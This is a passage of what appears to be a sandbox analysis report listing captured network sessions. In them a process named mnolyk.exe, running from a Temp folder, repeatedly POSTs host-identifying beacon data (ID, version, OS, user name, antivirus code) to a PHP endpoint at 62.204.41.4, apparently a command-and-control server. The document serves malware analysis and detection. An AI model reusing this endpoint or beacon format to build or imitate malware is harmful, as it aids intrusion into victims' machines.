                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:07.470880985 CET385INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    185192.168.2.34988762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:07.638708115 CET386OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:07.702848911 CET386INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    186192.168.2.34988862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:07.875066042 CET387OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:07.939343929 CET387INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    187192.168.2.34988962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:08.107630968 CET388OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:08.173487902 CET388INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    188192.168.2.34989062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:08.343446970 CET389OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:08.408909082 CET389INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    189192.168.2.34989162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:08.577608109 CET390OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:08.642038107 CET390INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    19192.168.2.34972062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:17.276374102 CET220OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:17.340347052 CET220INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    190192.168.2.34989262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:08.821841002 CET391OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:08.885063887 CET391INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    191192.168.2.34989362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:09.064081907 CET392OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:09.130045891 CET392INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    192192.168.2.34989462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:09.316596985 CET393OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:09.380016088 CET393INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    193192.168.2.34989562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:09.563401937 CET394OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:09.627557039 CET394INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    194192.168.2.34989662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:09.795234919 CET395OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:09.859213114 CET395INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    195192.168.2.34989762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:10.032773018 CET396OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:10.098812103 CET396INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    196192.168.2.34989862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:10.281507015 CET397OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:10.345503092 CET397INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    197192.168.2.34989962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:10.520937920 CET398OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:10.584842920 CET398INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    198192.168.2.34990062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:10.776958942 CET399OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:10.842241049 CET399INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    199192.168.2.34990162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:11.021220922 CET400OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:11.086133003 CET400INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    2192.168.2.34970362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:09.854969025 CET134OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:09.918930054 CET149INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    20192.168.2.34972162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:17.546134949 CET221OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:17.612584114 CET221INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    200192.168.2.34990262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:11.276709080 CET401OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:11.341573000 CET401INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    201192.168.2.34990362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
